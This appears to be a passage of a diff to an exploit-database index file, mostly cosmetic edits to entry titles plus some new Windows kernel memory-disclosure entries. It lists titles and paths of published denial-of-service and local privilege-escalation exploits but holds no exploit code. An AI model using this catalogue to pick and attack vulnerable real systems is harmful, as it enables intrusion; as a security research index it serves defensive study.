14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0 37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0 @@ -4636,7 +4636,7 @@ id,file,description,date,author,platform,type,port 37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (2)",2015-08-19,bilou,windows,dos,0 37849,platforms/windows/dos/37849.txt,"Adobe Flash - Display List Handling Use-After-Free",2015-08-19,KeenTeam,windows,dos,0 37850,platforms/multiple/dos/37850.txt,"Adobe Flash - NetConnection.connect Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 -37852,platforms/multiple/dos/37852.txt,"Adobe Flash - Setting Variable Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37852,platforms/multiple/dos/37852.txt,"Adobe Flash - 'Setting' Variable Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37853,platforms/windows/dos/37853.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (1)",2015-08-19,"Google Security Research",windows,dos,0 37854,platforms/windows/dos/37854.txt,"Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0 37855,platforms/multiple/dos/37855.txt,"Adobe Flash - Setting Value Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 @@ -4762,7 +4762,7 @@ id,file,description,date,author,platform,type,port 38288,platforms/windows/dos/38288.txt,"Kaspersky AntiVirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 38307,platforms/win_x86/dos/38307.txt,"Microsoft Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - '.qfl' Crash (PoC)",2015-09-25,Un_N0n,windows,dos,0 -38336,platforms/windows/dos/38336.py,"Git 1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0 +38336,platforms/windows/dos/38336.py,"Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0 38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0 38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate JavaScript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 38348,platforms/windows/dos/38348.txt,"Adobe Flash - 'uint' Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 @@ -4850,7 +4850,7 @@ id,file,description,date,author,platform,type,port 38878,platforms/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash (PoC)",2015-12-06,Un_N0n,windows,dos,0 38909,platforms/linux/dos/38909.txt,"DenyHosts - 'regex.py' Remote Denial of Service",2013-12-19,"Helmut Grohne",linux,dos,0 38916,platforms/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 -38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 +38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0 38931,platforms/multiple/dos/38931.txt,"Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0 38932,platforms/multiple/dos/38932.txt,"Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 @@ -4900,8 +4900,8 @@ id,file,description,date,author,platform,type,port 39046,platforms/windows/dos/39046.txt,"Adobe Flash TextField.setFormat - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39047,platforms/windows/dos/39047.txt,"Adobe Flash TextField.replaceSel - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39048,platforms/windows/dos/39048.txt,"Adobe Flash TextField.replaceText - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 -39049,platforms/windows/dos/39049.txt,"Adobe Flash TextField Variable - Use-After Free",2015-12-18,"Google Security Research",windows,dos,0 -39050,platforms/windows/dos/39050.txt,"Adobe Flash TextField.Variable Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 +39049,platforms/windows/dos/39049.txt,"Adobe Flash - 'TextField' Variable Use-After Free",2015-12-18,"Google Security Research",windows,dos,0 +39050,platforms/windows/dos/39050.txt,"Adobe Flash - TextField.Variable Setter Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39051,platforms/windows/dos/39051.txt,"Adobe Flash TextField.htmlText Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39052,platforms/windows/dos/39052.txt,"Adobe Flash TextField.type Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39053,platforms/windows/dos/39053.txt,"Adobe Flash TextField.text Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 @@ -4911,7 +4911,7 @@ id,file,description,date,author,platform,type,port 39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0 39070,platforms/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - Overwrite (SEH) (PoC)",2015-12-21,Un_N0n,windows,dos,0 39072,platforms/win_x86-64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win_x86-64,dos,0 -39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/reboot.cgi Unauthenticated Remote Reboot Denial of Service",2014-02-03,"Josue Rojas",cgi,dos,0 +39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service)",2014-02-03,"Josue Rojas",cgi,dos,0 39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39082,platforms/multiple/dos/39082.txt,"PHP 7.0.0 - Format String",2015-12-23,"Andrew Kramer",multiple,dos,0 @@ -5189,7 +5189,7 @@ id,file,description,date,author,platform,type,port 40037,platforms/multiple/dos/40037.txt,"Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0 40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash (PoC)",2016-07-08,hyp3rlinx,windows,dos,0 -40074,platforms/windows/dos/40074.txt,"Microsoft WinDbg - logviewer.exe Crash (PoC)",2016-07-08,hyp3rlinx,windows,dos,0 +40074,platforms/windows/dos/40074.txt,"Microsoft WinDbg - 'logviewer.exe' Crash (PoC)",2016-07-08,hyp3rlinx,windows,dos,0 40183,platforms/multiple/dos/40183.html,"WebKit - TypedArray.fill Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 40182,platforms/arm/dos/40182.txt,"Linux ARM/ARM64 - perf_event_open() Arbitrary Memory Read",2016-07-29,"Google Security Research",arm,dos,0 40310,platforms/multiple/dos/40310.txt,"Adobe Flash - BitmapData.copyPixels Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0 @@ -5442,6 +5442,7 @@ id,file,description,date,author,platform,type,port 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0 41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0 +42223,platforms/windows/dos/42223.cpp,"Microsoft Windows - 'win32k!NtGdiExtGetObjectW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 41916,platforms/windows/dos/41916.py,"PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH)",2017-04-25,Muhann4d,windows,dos,0 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0 @@ -5567,6 +5568,16 @@ id,file,description,date,author,platform,type,port 42218,platforms/windows/dos/42218.cpp,"Microsoft Windows - 'nt!NtQueryVolumeInformationFile (FileFsVolumeInformation)' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos,0 42219,platforms/windows/dos/42219.cpp,"Microsoft Windows - 'nt!NtNotifyChangeDirectoryFile' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos,0 42220,platforms/windows/dos/42220.cpp,"Microsoft Windows - 'nt!KiDispatchException' Kernel Stack Memory Disclosure in Exception Handling",2017-06-21,"Google Security Research",windows,dos,0 +42224,platforms/windows/dos/42224.cpp,"Microsoft Windows - 'win32k!NtGdiGetOutlineTextMetricsInternalW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42225,platforms/windows/dos/42225.cpp,"Microsoft Windows - 'win32k!NtGdiGetTextMetricsW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42226,platforms/windows/dos/42226.cpp,"Microsoft Windows - 'win32k!NtGdiGetRealizationInfo' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42227,platforms/windows/dos/42227.cpp,"Microsoft Windows - 'win32k!ClientPrinterThunk' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42228,platforms/windows/dos/42228.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (BasicLimitInformation_ ExtendedLimitInformation)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42229,platforms/windows/dos/42229.cpp,"Microsoft Windows - 'nt!NtQueryInformationProcess (ProcessVmCounters)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42230,platforms/windows/dos/42230.txt,"Microsoft Windows - 'win32k!NtGdiMakeFontDir' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42231,platforms/windows/dos/42231.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42232,platforms/windows/dos/42232.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 +42233,platforms/windows/dos/42233.cpp,"Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5621,7 +5632,7 @@ id,file,description,date,author,platform,type,port 210,platforms/solaris/local/210.c,"Solaris locale - Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 215,platforms/linux/local/215.c,"GLIBC locale - bug mount Exploit",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 -217,platforms/linux/local/217.c,"UUCP Exploit - File Creation/Overwriting (symlinks) Exploit",2000-12-04,t--zen,linux,local,0 +217,platforms/linux/local/217.c,"UUCP Exploit - File Creation/Overwriting (Symlinks) Exploit",2000-12-04,t--zen,linux,local,0 218,platforms/linux/local/218.c,"expect (/usr/bin/expect) - Buffer Overflow",2000-12-04,isox,linux,local,0 219,platforms/linux/local/219.c,"GnomeHack - Local Buffer Overflow (gid=games)",2000-12-04,"Cody Tubbs",linux,local,0 221,platforms/linux/local/221.c,"Kwintv - Local Buffer Overflow (gid=video(33))",2000-12-06,"Cody Tubbs",linux,local,0 @@ -5629,25 +5640,25 @@ id,file,description,date,author,platform,type,port 229,platforms/linux/local/229.c,"xsoldier 0.96 (RedHat 6.2) - Exploit",2000-12-15,zorgon,linux,local,0 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Exploit",2000-12-15,mat,linux,local,0 243,platforms/bsd/local/243.c,"BSD chpass - 'pw_error(3)' Privilege Escalation",2001-01-12,caddis,bsd,local,0 -245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation",2001-01-13,zorgon,hp-ux,local,0 +245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - '/bin/cu' Privilege Escalation",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC locale - Format Strings Exploit",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta - arp Local Overflow",2001-01-15,ahmed,solaris,local,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux - Exploit",2001-01-15,teleh0r,linux,local,0 255,platforms/linux/local/255.pl,"RedHat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 -256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow",2001-01-25,"Pablo Sor",solaris,local,0 +256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,sco,local,0 -265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 -270,platforms/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 +265,platforms/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 +270,platforms/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZip - MIME Parsing Overflow (PoC)",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail - 'chpasswd' Buffer Overflow",2004-04-20,x314,linux,local,0 -281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - /usr/bin/at Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local,0 -285,platforms/linux/local/285.c,"Slackware 7.1 - /usr/bin/mail Local Exploit",2001-03-03,kengz,linux,local,0 +281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local,0 +285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local Exploit",2001-03-03,kengz,linux,local,0 286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation",2001-03-03,dethy,bsd,local,0 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - (prodb) Privilege Escalation",2001-03-04,"the itch",multiple,local,0 @@ -5659,15 +5670,15 @@ id,file,description,date,author,platform,type,port 321,platforms/multiple/local/321.c,"BSD & Linux umount - Privilege Escalation",1996-08-13,bloodmask,multiple,local,0 322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0 325,platforms/linux/local/325.c,"BSD & Linux lpr - Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 -328,platforms/solaris/local/328.c,"Solaris 2.4 - /bin/fdformat Local Buffer Overflows",1997-03-23,"Cristian Schipor",solaris,local,0 -330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 +328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0 +330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt - XtAppInitialize() Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 -333,platforms/aix/local/333.c,"AIX 4.2 - /usr/dt/bin/dtterm Local Buffer Overflow",1997-05-27,"Georgi Guninski",aix,local,0 +333,platforms/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",aix,local,0 334,platforms/irix/local/334.c,"SGI IRIX - Multiple Buffer Overflows (LsD)",1997-05-25,LSD-PLaNET,irix,local,0 335,platforms/aix/local/335.c,"AIX lquerylv - Buffer Overflow Privilege Escalation",1997-05-26,"Georgi Guninski",aix,local,0 -336,platforms/irix/local/336.c,"SGI IRIX - /bin/login Local Buffer Overflow",1997-05-26,"David Hedley",irix,local,0 -337,platforms/irix/local/337.c,"IRIX 5.3 - /usr/sbin/iwsh Buffer Overflow Privilege Escalation",1997-05-27,"David Hedley",irix,local,0 +336,platforms/irix/local/336.c,"SGI IRIX - '/bin/login Local' Buffer Overflow",1997-05-26,"David Hedley",irix,local,0 +337,platforms/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Buffer Overflow Privilege Escalation",1997-05-27,"David Hedley",irix,local,0 338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation",1997-05-28,"David Hedley",solaris,local,0 339,platforms/linux/local/339.c,"zgv - '$HOME' Buffer Overflow",1997-06-20,"BeastMaster V",linux,local,0 341,platforms/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Overflows",1997-07-12,"Cristian Schipor",solaris,local,0 @@ -5731,7 +5742,7 @@ id,file,description,date,author,platform,type,port 756,platforms/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local Exploit (PoC)",2005-01-15,"Rafael Carrasco",linux,local,0 760,platforms/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper Exploit",2005-01-16,ATmaCA,windows,local,0 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 -766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 +766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - 'mRouter' Privilege Escalation",2005-01-22,nemo,osx,local,0 769,platforms/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow",2005-01-24,ATmaCA,windows,local,0 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local,0 @@ -5833,11 +5844,11 @@ id,file,description,date,author,platform,type,port 1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0 1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0 -1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0 +1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure",2005-11-09,kingcope,bsd,local,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 -1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0 +1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit",2005-12-07,c0ntex,solaris,local,0 1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 @@ -5933,10 +5944,10 @@ id,file,description,date,author,platform,type,port 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - (swask) Format String Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 -2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - (LIBC TZ enviroment Variable) Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 +2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",solaris,local,0 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 -2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 +2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0 @@ -6023,7 +6034,7 @@ id,file,description,date,author,platform,type,port 3776,platforms/windows/local/3776.c,"ACDSee 9.0 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 3777,platforms/windows/local/3777.c,"XnView 1.90.3 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 3779,platforms/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - '.clp' Buffer Overflow",2007-04-23,Marsu,windows,local,0 -3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 - / CS3 Unspecified '.bmp' File Buffer Overflow",2007-04-24,Marsu,windows,local,0 +3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow",2007-04-24,Marsu,windows,local,0 3797,platforms/windows/local/3797.c,"ABC-View Manager 1.42 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0 3798,platforms/windows/local/3798.c,"FreshView 7.15 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0 3801,platforms/windows/local/3801.c,"GIMP 2.2.14 - '.ras' SUNRAS Plugin Buffer Overflow",2007-04-26,Marsu,windows,local,0 @@ -6163,7 +6174,7 @@ id,file,description,date,author,platform,type,port 40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 -7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 +7313,platforms/linux/local/7313.sh,"Debian - (Symlink In Login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow",2008-12-03,Encrypt3d.M!nd,windows,local,0 7334,platforms/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 7347,platforms/windows/local/7347.pl,"PEiD 0.92 - Malformed '.PE' File Universal Buffer Overflow",2008-12-05,SkD,windows,local,0 @@ -6194,7 +6205,7 @@ id,file,description,date,author,platform,type,port 7677,platforms/multiple/local/7677.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (1)",2009-01-06,sh2kerr,multiple,local,0 7681,platforms/linux/local/7681.txt,"Debian XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0 -7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow",2009-01-07,send9,windows,local,0 +7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow",2009-01-07,send9,windows,local,0 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0 7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local,0 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0 @@ -6346,7 +6357,7 @@ id,file,description,date,author,platform,type,port 9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege 